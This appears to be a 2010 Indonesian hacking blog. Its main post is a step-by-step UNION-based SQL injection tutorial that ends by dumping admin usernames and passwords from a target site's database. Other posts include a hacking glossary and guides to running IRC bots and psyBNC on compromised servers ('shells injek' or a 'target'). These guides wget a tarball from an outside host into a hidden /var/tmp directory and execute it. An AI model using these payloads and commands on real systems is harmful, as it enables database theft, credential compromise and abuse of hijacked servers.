Thursday 22 July 2010 Posted by ARYO at 02:55

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ?.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


By:
Aryo LinkchatcreW ComunitY

PENGERTIAN HACKING Posted by ARYO at 02:35

ISTILAH-ISTILAH HACKING :

RFI (Remote File Inclusion)

-> penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script didalam akan dieksekusi pada saat file yang disisipi di-load

LFI (Local File Inclusion)

-> suatu bug dimana kita bisa menginclude kan file (file yang berada didalam server yg bersangkutan)

ke page yang vulnerable (vulnerable LFI maksudnya).

SQL Injection

-> salah satu jenis penyerangan yang mengijinkan user tidak sah(penyerang)untuk mengakses database server atau memasukkan (injeksi) command2 sql ke dalm query sql dlm prgram, memanipulasi query sql dlm program.

DDOS

-> Distributed Denial of Service. DoS sndiri adalah serangan dgn melakukan request terus menerus pd victim dg tujuan untk mghabiskan resource pd victim,spt bandwith,memory,dll. Victim yg kehabisan resource, akan down. *"Distributed" DoS adalah DoS yg d lakukan secara terdistribusi atau berjamaah dlm jumlah besar,biasanya menggunakan bot pd irc.

Bug

-> Kesalahan pada pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.

Patch

-> Perbaikan terhadap bug dengan mengupdate sistem yg vurnerable.

Vurnerable

-> Sistem yang memiliki bug sehingga rentan terhadap serangan.

Shell

-> inti dari sistem operasi.Shell mengendalikan krj sistem operasi nya.

Shell interpreter

-> bentuk antarmuka yg merupakan penghubung antara shell dgn brainware. Bentuk umumnya berupa console,cmd,webshell,dll.

Deface

-> merubah tampilan hlman suatu website secara illegal

Debug

-> kegiatan mencari bug pada aplikasi dan memperbaiki bug yg d temukan.

XSS

-> adalah suatu cara memasukan code/script HTML kedalam suatu web site dan dijalankan melalui browser di client

Phising

-> adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.

Keylogger

-> adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard (bekerja diam diam alias tidak terketahui oleh kita secara kasat mata)

Friday 16 July 2010 DOWNLOAD TCL EGGDROP DAN PYSBNC Posted by ARYO at 15:29

Psybnc eggdrop dan tcl bisa kamu download disini langsung tinggal kamu edit sendiri.
oke to the poin dikarenakan dah pagi dah waktunya mau mandi trus working hehehe..
pertama sebelum download bikin kopi dulu
kedua idupin rokoknya tuh
nah ketiga bedoa buat bubu biar nyenyak yah hihhihii...ok last time.

****##################################****

1.download tcl untuk kuis 10in1 silahkan klik klik di sini.
2.download tcl kuis 5in1 silahkan klik di sini.
3.download google tcl silahkan klik di sini.
4.download auth tcl silahkan klik di sini.
5.download autoversion tcl silahkan klik di sini.
6.download away tcl silahkan klik di sini.
7.download bdseen tcl silahkan klik di sini.
8.download berita tcl silahkan klik di sini.
9.download dns tcl silahkan klik di sini.
10.download funping tcl silahkan klik di sini.
11.download guard tcl silahkan klik di sini.
12.download ip tcl silahkan klik di sini.
13.download iseng tcl silahkan klik di sini.
14.download jam tcl silahkan klik di sini.
15.download jodoh tcl silahkan klik di sini.
16.download joingreet tclsilahkan klik di sini.
17.download kaos tcl silahkan klik di sini.
18.download os tcl silahkan klik di sini.
19.download partgreet tcl silahkan klik di sini.
20.download portchk tcl silahkan klik di sini.
21.download rewel tcl silahkan klik di sini.
22.download salam tcl silahkan klik di sini.
23.download seen tcl silahkanklik di sini.
24.download thanksfor tcl silahkanklik di sini.
25.download uno tcl silahkanklik di sini.
26.download versi tcl silahkanklik di sini.
27.download wb tcl silahkanklik di sini.
28.download whois tcl silahkanklik di sini.

29.download psy untuk injekan silahkanklik di sini.
30.download sbnc silahkanklik di sini.

31.download bot folder linux silahkanklik di sini.
32.download bot folder date silahkanklik di sini.

****##################################****

yups sementara ini dulu lainya akan saya susulkan,terimakasih alias matur nuwon.

Saturday 10 July 2010 INSTAL EGGDROP Posted by ARYO at 20:34

instal eggdrop atau bot untuk mirc,apa itu eggdrop atau bot ya..hehe bisa dikatakan robot yang bisa kita gunakan atau kita suruh menurut comand2 didalamnya.
tergantung kita memasukan tcl atau script ke eggdrop tersebut,kadang untuk kuis,protect,flood,salam,ataupun lainya.
oke to the point ajah saya berikan tutorialnya,bagi para master2 g usah dibaca karena mungkin sudah hal kecil atau mudah untuk pembuatanya.
pertama2 siapin kopi,rokok,ama cemilan hehehe...
untuk tutorial ini saya mengarah ke shells injek
1. buka shells kamu,yang jelas jangan buka shell pintu tar pintunya copot..tar kalau tidur keliatan tanpa pintu xixixi...
2. wget http://knowhow-now.biz//images/icons/bot.tar.gz
3. tar -zxvf bot.tar.gz
4. rm -rf bot.tar.gz
5. cd .linux trus download http://knowhow-now.biz//images/icons/eggdrop.conf lalu edit
6. upload eggdrop.conf kamu yang sudah kamu edit
7. cd .linux/scripts
8. upload tcl yang kamu inginkan yang jelas tcl yang sudah kamu masukan di eggdrop.conf
9. kembali ke cd .linux
10. ./eggdrop -m eggdrop.conf
oke tinggal tunggu dichan atau kamu pm nama botnya dan masukin pass ama login kamu
slesai dech hehehe...
kalau kurang jelas hubungi saja saya diserver irc.linkchat.org

MEMBUAT PSYBNC ATAU SBNC Posted by ARYO at 13:17

membuat psybnc atau sbnc,istilah sbnc atau psybnc pasti kalian dah banyak tau
nah ini sedikit pengetahuan bagi yang pengen belajar
pertama2 siapin shells legal ataupun injekan terserah kalian,nah lanjut..to the point aja dah pagi kebanyakan melek ni mata sepet juga hehehe...siang kerja malam cuman melekan sendiri huftt..kegiatan dech cari yang aneh2 gini hehehe..oke mari kita baca bareng2..
cuci tangan
cuci kaki
bedoa dulu ya hehehe
goo...
--****Sbnc dengan shells legal atau lewat shells ssh****--
1. login dulu ke shell kmu liwat puting.
2. download source sBNC nya.
- di http://mirror.shroudbnc.info/sbnc-1.1.tar.gz terus upload ke shells kamu. cara yg simpel pakek program WinScp. http://winscp.net/eng
- atau pake cara ini wget http://mirror.shroudbnc.info/sbnc-1.1.tar.gz <-- copas aja ini di puting. trs tunggu proses nya selese.
3. udah di download trs ekstrak sBNC nya.
[shells@kamu ~]$ tar -zvxf sbnc-1.1.tar.gz
4. masuk ke direktori sBNC hasil ekstrak tadi
ketik: cd sbnc-1.1
5. truz konfigurasi sBNc nya
ketik: ./configure
6. kalo udah berhasil kofigurasinya lansung.
ketik: gmake
7. truz
ketik lagi : gmake install
8. ntar ada direktori baru yang bernama "sbnc" letaknya di home/thondi/sbnc ada di sebela direktori sbnc-1.1.
ketik: cd ~/sbnc atau cd /home/thondi/sbnc
9. ketik: ./conftool
ntar ada tampilan kayak gini
===============================================================================
This utility will automatically generate a suitable configuration for you once it has asked you some questions.
1. Which port should the bouncer listen on? [9000] <-- ini isi port buat sbnc nya gan
2. What should the first user's name be? <-- isi ident buat sbnc nya gan
3. Please enter a password for the first user: <-- nah ini pasti tau kan di isi afa.

Writing config...
===============================================================================
10. terakhit buat run atau jalanin sbnc nya. cukup
ketik: ./sbnc
11. biar sBNC nya cuma 1 proses jangan lupa restart sBNCnya
ketik: ./sbnc --lps

--****paybnc dengan shells injek atau target****--
1. login ke shells kamu
2. cd /var/tmp;wget mal1ng.110mb.com/psy.tar.gz
2. cd /var/tmp;tar -zxvf psy.tar.gz
3. cd /var/tmp;rm -rf psy.tar.gz
4. cd /var/tmp/.psy;./config (PORT)
5. cd /var/tmp/.psy;./fuck
6. cd /var/tmp/.psy;./run
kalau uda dirun coba join ke #kaliurang server irc.gamesurge.net lalu test portcheck.. example !port (nomerIP) (PORT)
atau hubungi nick saya diserver irc.linkchat.org
selamat mencoba deh moga bisa buat kesibukan atau pengetahuan kalian hehehe